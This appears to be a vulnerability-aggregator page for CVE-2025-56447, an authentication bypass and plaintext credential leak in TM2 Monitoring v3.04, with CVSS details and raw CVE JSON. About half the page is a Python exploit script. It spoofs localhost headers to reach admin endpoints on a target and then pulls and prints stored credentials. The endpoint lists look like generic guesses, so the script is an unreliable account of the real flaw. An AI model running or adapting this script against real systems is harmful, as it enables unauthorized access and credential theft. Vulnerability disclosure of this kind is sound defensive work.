Security Vulnerability Report
中文
CVE-2025-56447 CVSS 9.8 CRITICAL

CVE-2025-56447

Published: 2025-10-22 14:15:51
Last Modified: 2026-04-15 00:35:42

Description

TM2 Monitoring v3.04 contains an authentication bypass and plaintext credential disclosure.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

TM2 Monitoring v3.04

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-56447 - TM2 Monitoring v3.04 Authentication Bypass & Plaintext Credential Disclosure # Reference: https://gist.github.com/stSLAYER/b0be1f0fe95f56c08ef2bd69f40cd817 # Affected Product: TM2 Monitoring v3.04 # Author: stSLAYER import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-ip" # Step 1: Authentication Bypass - Access protected endpoint without credentials def bypass_authentication(target): """ Exploit authentication bypass to access protected resources without providing valid credentials. """ # Attempt to access admin panel or configuration endpoint directly bypass_endpoints = [ "/admin", "/config", "/settings", "/monitoring/config", "/api/config", "/api/users", "/api/credentials", "/backup/config" ] headers = { "User-Agent": "Mozilla/5.0", "X-Forwarded-For": "127.0.0.1", "X-Real-IP": "127.0.0.1" } for endpoint in bypass_endpoints: url = f"{target}{endpoint}" try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200 and len(response.text) > 0: print(f"[+] Bypass successful at: {url}") print(f"[+] Response:\n{response.text[:500]}") return response.text except requests.exceptions.RequestException as e: continue return None # Step 2: Extract plaintext credentials def extract_credentials(target): """ Retrieve plaintext credentials stored in the monitoring system. """ credential_endpoints = [ "/config/credentials", "/admin/credentials", "/settings/auth", "/monitoring/credentials", "/backup/credentials", "/api/v1/credentials", "/data/credentials.xml", "/data/credentials.json", "/config/users.xml" ] for endpoint in credential_endpoints: url = f"{target}{endpoint}" try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Credentials found at: {url}") print(f"[+] Content:\n{response.text}") return response.text except requests.exceptions.RequestException: continue return None if __name__ == "__main__": print(f"[*] Targeting: {TARGET_URL}") print("[*] Attempting authentication bypass...") result = bypass_authentication(TARGET_URL) if result: print("\n[*] Attempting credential extraction...") creds = extract_credentials(TARGET_URL) if creds: print("[+] Plaintext credentials successfully extracted!") else: print("[-] Could not extract credentials from known endpoints") else: print("[-] Authentication bypass unsuccessful")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56447", "sourceIdentifier": "[email protected]", "published": "2025-10-22T14:15:50.693", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "TM2 Monitoring v3.04 contains an authentication bypass and plaintext credential disclosure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-319"}]}], "references": [{"url": "http://rt.com", "source": "[email protected]"}, {"url": "http://tm2.com", "source": "[email protected]"}, {"url": "https://gist.github.com/stSLAYER/b0be1f0fe95f56c08ef2bd69f40cd817", "source": "[email protected]"}, {"url": "https://github.com/stSLAYER/ZeroDayVulnerabilities-/blob/main/RT-Systems/POC/README.md", "source": "[email protected]"}]}}